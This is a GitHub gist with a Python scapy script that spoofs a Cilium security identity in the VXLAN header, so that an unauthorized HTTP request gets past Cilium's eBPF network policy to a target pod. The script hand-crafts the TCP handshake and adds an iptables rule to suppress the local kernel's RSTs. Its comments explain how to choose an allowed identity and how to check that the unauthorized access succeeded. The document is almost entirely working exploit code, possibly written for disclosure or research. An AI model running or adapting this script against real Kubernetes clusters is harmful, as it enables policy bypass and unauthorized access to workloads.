Created
December 31, 2020 11:51
-
-
Save nyrahul/ef619c4b04dd2afb45b42d51ae6b00ef to your computer and use it in GitHub Desktop.
Spoofing Cilium identity value in vxlan tunneled mode
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python | |
# The aim of this script is to send a VXLAN-tunneled HTTP request with a spoofed
# identity so that it passes the authorization checks implemented in cilium-ebpf.
# Configuration you need to set correctly:
# 1. The target pod address (dip, dport) to which you want to make unauthorized access.
# 2. The source identity (identity = 8849 below) to spoof. Use `cilium identity
#    list` to check valid identity values.
# 3. The target node's VXLAN IP address (vxlan_ip) and port (vxlan_port = 8472,
#    the default used by Cilium).
# How do you verify that the unauthorized access worked, i.e. that the spoofed
# identity was accepted?
# You will receive a successful HTTP response from the target application even
# though the policy says deny all except a specific identity (the identity
# spoofed by this script).
# You can use `hubble observe` to monitor the policy verdicts.
# You can use `tcpdump` to check packet flows.
# Note that you need to drop the RST sent by your own kernel. The kernel sends a
# TCP RST for the unexpected SYN-ACK received from the remote: it knows of no
# TCP session to which this SYN-ACK belongs, because scapy uses RAW sockets to
# send the SYN. add_iptable_rule()/rem_iptable_rule() handle this drop
# operation.
from scapy.all import * | |
from time import sleep | |
import random | |
import atexit | |
import os | |
# Rule specification of the currently installed RST-drop iptables rule, or
# None when no rule is installed.
iptrule = None


@atexit.register
def rem_iptable_rule():
    """Delete the RST-dropping iptables rule, if one is recorded.

    Registered with ``atexit`` so the rule is removed when the script exits.
    The recorded rule is cleared after deletion, so calling this function
    again is a no-op instead of a second ``iptables -D`` on a missing rule.
    """
    global iptrule
    if iptrule is None:
        return
    os.system("iptables -D " + iptrule)  # Delete the iptable rule
    iptrule = None  # forget the rule so it is never deleted twice
def add_iptable_rule(sport, dport):
    """Install an iptables rule dropping outgoing TCP RSTs for one flow.

    The rule matches packets in the OUTPUT chain with the RST flag set and
    the given source/destination ports. Only one rule is tracked at a time
    (in the module-level ``iptrule``); a second call while a rule is
    recorded prints a notice and does nothing.

    Args:
        sport: TCP source port of the flow whose RSTs must be dropped.
        dport: TCP destination port of that flow.
    """
    global iptrule
    if iptrule is not None:
        print("Iptables rule is already added.")
        return
    rule = " OUTPUT -p tcp --tcp-flags RST RST --sport " + str(sport) + " --dport " + str(dport) + " -j DROP"
    status = os.system("iptables -A " + rule)  # Apply the iptable rule
    if status != 0:
        # Do not record a rule that was never installed; otherwise the
        # cleanup code would later try to delete a non-existent rule.
        print("Failed to add iptables rule (status " + str(status) + ").")
        return
    iptrule = rule
# Add vxlan encapsulation and send the pkt
# use VXLAN_DISABLE=1 env var to disable adding encap hdr
def vxlan_send(pkt, vxlan_ip="192.168.33.11", vxlan_port=8472, identity=8849):
    """Send ``pkt`` wrapped in an IP/UDP/VXLAN header carrying a spoofed identity.

    If the ``VXLAN_DISABLE`` environment variable is set to anything other
    than ``"0"``, the packet is sent as-is without encapsulation.

    Args:
        pkt: the inner scapy packet to transmit.
        vxlan_ip: IP address of the target node's VXLAN endpoint.
        vxlan_port: UDP destination port of the VXLAN tunnel.
        identity: value placed in the VXLAN VNI field, as expected by
            cilium; use `cilium identity list` to check which identities
            are allowed and spoof one of them.

    Returns:
        Whatever scapy's ``send()`` returns for the transmitted packet.
    """
    vxlan_disable = os.getenv('VXLAN_DISABLE')
    if vxlan_disable is not None and vxlan_disable != "0":
        return send(pkt)
    # Encapsulate the input pkt with vxlan
    tpkt = IP(dst=vxlan_ip) / UDP(dport=vxlan_port) / VXLAN(vni=identity) / pkt
    return send(tpkt)
def send_http_req(dip="10.11.0.16", sip="10.11.1.44", dport=80):
    """Perform a hand-rolled TCP handshake and HTTP POST through the tunnel.

    Steps, in order:
      1. Install the iptables rule that drops the local kernel's RST.
      2. Send a SYN via ``vxlan_send`` and again via ``sr1`` to collect the
         SYN-ACK.
      3. Wait for one UDP packet addressed to port 8472.
      4. Send an ACK carrying the HTTP request via ``vxlan_send``.
      5. Sniff three TCP packets from the peer and show the first one whose
         IP length exceeds 50 bytes.

    Args:
        dip: destination (pod) IP address.
        sip: source IP address placed in the inner packet.
        dport: destination TCP port.
    """
    payload = 'POST /v1/request-landing HTTP/1.1\r\nHost: ' + dip + '\r\n\r\n'  # packet payload
    seq = random.randint(2, 2 ** 24)  # Generate random initial TCP seq num
    sport = random.randint(10000, 60000)  # Generate random source port within upper uint16_t range

    add_iptable_rule(sport, dport)  # Add iptables rule to drop the RST

    syn = IP(src=sip, dst=dip) / TCP(dport=dport, sport=sport, flags='S', seq=seq)
    vxlan_send(syn)
    syn_ack = sr1(syn)  # Receive TCP SYN-ACK
    if syn_ack is None or not syn_ack.haslayer(TCP):
        # Without a TCP answer there is no sequence number to acknowledge.
        print("No TCP SYN-ACK received from " + dip + "; aborting.")
        return

    # Block until one tunneled packet is seen; its summary is printed by sniff.
    pcapfilter = "udp and dst port 8472"
    sniff(iface=get_if_list(), filter=pcapfilter, prn=lambda p: p.summary(), count=1)

    # ACK the SYN-ACK and piggy-back the HTTP request on the same segment.
    req = IP(src=syn_ack[IP].dst, dst=syn_ack[IP].src) / \
        TCP(dport=dport, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack,
            ack=syn_ack[TCP].seq + 1, flags='A') / \
        payload
    req.show2()
    vxlan_send(req)

    pkts = sniff(filter="tcp and src host " + syn_ack[IP].src, count=3)  # wait for TCP packets from the dip
    pkts.nsummary()
    # The peer usually responds with a bare TCP ACK first and then with the
    # HTTP response, so short packets are skipped.
    for rsp in pkts:
        if rsp[IP].len > 50:  # Any IP pkt with len>50 will be a HTTP response
            rsp.show()  # show the HTTP response
            break
# Run the spoofed request only when executed as a script, so importing this
# module does not send packets or touch iptables.
if __name__ == "__main__":
    send_http_req()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment